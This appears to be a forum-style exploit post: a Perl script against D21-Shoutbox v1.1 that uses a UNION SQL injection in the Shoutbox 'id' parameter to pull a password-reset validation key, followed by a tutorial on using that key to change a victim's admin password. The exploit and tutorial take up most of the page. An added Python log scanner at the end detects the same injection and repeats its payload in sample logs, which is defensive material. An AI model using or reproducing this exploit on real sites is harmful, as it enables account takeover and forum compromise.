Screech

D21-Shoutbox v1.1 Exploit Admin Password Change


Exploit:

################################################

#!/usr/bin/perl #

# D21-Shoutbox v1.1 Exploit Admin Password Change #

# Author: Synsta #

# Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431 #

# Original Exploit Found by Windak & langtuhaohoa #

################################################

use HTTP::Cookies;

use LWP 5.64;

use HTTP::Request;

# variables

my $login_page = '?act=Login&CODE=01';

my $id = '';

my $table_fix = '';

my $pose_pm_page = '?';

my $tries = 5;

my $sql = '';

my $i;

my $j;

# objects

my $ua = LWP::UserAgent->new;

my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);

my $resp;

# init the cookie jar

$ua->cookie_jar ($cj);

# allow redirects on post requests

push @{ $ua->requests_redirectable }, "POST";

# get user input

print 'Shoutbox URL (ex: forumurl.com/forum): ';

chomp (my $base_url = <STDIN>);

print 'Your Username: ';

chomp (my $user = <STDIN>);

$form{entered_name} = $user;

print 'Your Password: ';

# systems without stty will error otherwise

my $stty = -x '/bin/stty';

system 'stty -echo' if $stty; # to turn off echoing

chomp (my $pass = <STDIN>);

system 'stty echo' if $stty; # to turn it back on

print "\n" if $stty;

print 'ID:'; # it'll say next to one of their posts

chomp (my $id = <STDIN>);

print 'Table prefix (ex: ibf_): ';

chomp ( my $table_fix = <STDIN>);

if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }

if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }

do {

$resp = $ua->post ($base_url . $login_page,

[ UserName => $user,

PassWord => $pass,

CookieDate => 1,

]);

} while ($tries-- && !$resp->is_success());

# did we get 200 (OK) ?

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }

# was the pass right ?

if ($resp->content =~ /sorry, the password was wrong/i) {

die "Error: password incorrect.\n";

}

$| = 1;

print "\nAttempting to extract validation key from the database...\n ";

$sql = "?act=Shoutbox&view=mycp?=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*";

$resp = $ua->get ($base_url . $post_pm_page . $sql );

if (!$resp->is_success()) {

print "ERROR" ;

}

else {

print "" ;

#print $resp->content;

$rs=$resp->content;

if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "\nValidation Key: "; print $1 ;

print "\n \nAuthor: Synsta\n";

print "Website: w4ck1ng.com\n";

print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431\n";

}

else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}

}

<STDIN>;

Tut:

1. Go to the forum where the shoutbox is installed, then click the "I've forgotten my password! Click here!" form, enter the nick of the person whose password you want to change and the code, and press Proceed.

2. Run the exploit.

3. You will now receive the Validation Key; go to the validation form (usually site/forum/index.php?act=Reg&CODE=lostpassform), enter the victim's ID and the key... and you've changed the password :D
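
For defenders, the injected request in the script above is visible in web server access logs, because the `id` parameter of an `act=Shoutbox` request should only ever be a plain integer. The following is an added example, not part of the original post, that flags such requests in combined-format access logs; the log lines, IP addresses and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); hosts and values are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2007:10:00:00 +0000] "GET /forum/index.php?act=Shoutbox&view=mycp&do=add&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2007:10:00:05 +0000] "GET /forum/?act=Shoutbox&view=mycp?=ignored&do=add&id=-1%20union%20select%20vid,1,1%20from%20ibf_validating%20where%20member_id=1/* HTTP/1.1" 200 7311',
    '203.0.113.9 - - [01/Jan/2007:10:00:09 +0000] "GET /forum/index.php?act=Reg&CODE=lostpassform HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2007:10:01:00 +0000] "GET /forum/index.php?act=Shoutbox&do=add&id=12abc HTTP/1.1" 200 900',
]

# client IP, then the request target inside the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
INT_RE = re.compile(r"\d+")


def suspicious_shoutbox_requests(lines):
    """Return (client_ip, decoded id value, mentions_validating_table) for every
    Shoutbox request whose id parameter is not a plain non-negative integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        ip, target = m.groups()
        # parse_qs percent-decodes values, so encoded payloads are compared in clear
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if not any(a.lower() == "shoutbox" for a in params.get("act", [])):
            continue
        for value in params.get("id", []):
            # Allow-list check: anything other than digits is abnormal here
            if not INT_RE.fullmatch(value):
                # The page's query reads the password-reset "validating" table
                hits.append((ip, value, "validating" in value.lower()))
    return hits


if __name__ == "__main__":
    for ip, value, reset_table in suspicious_shoutbox_requests(SAMPLE_LOG):
        level = "HIGH" if reset_table else "review"
        print(f"[{level}] {ip} sent non-integer Shoutbox id: {value!r}")
```

The same allow-list rule (cast or validate `id` as an integer before it reaches the query) is the fix on the application side; the log check only covers parameters sent in the URL.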
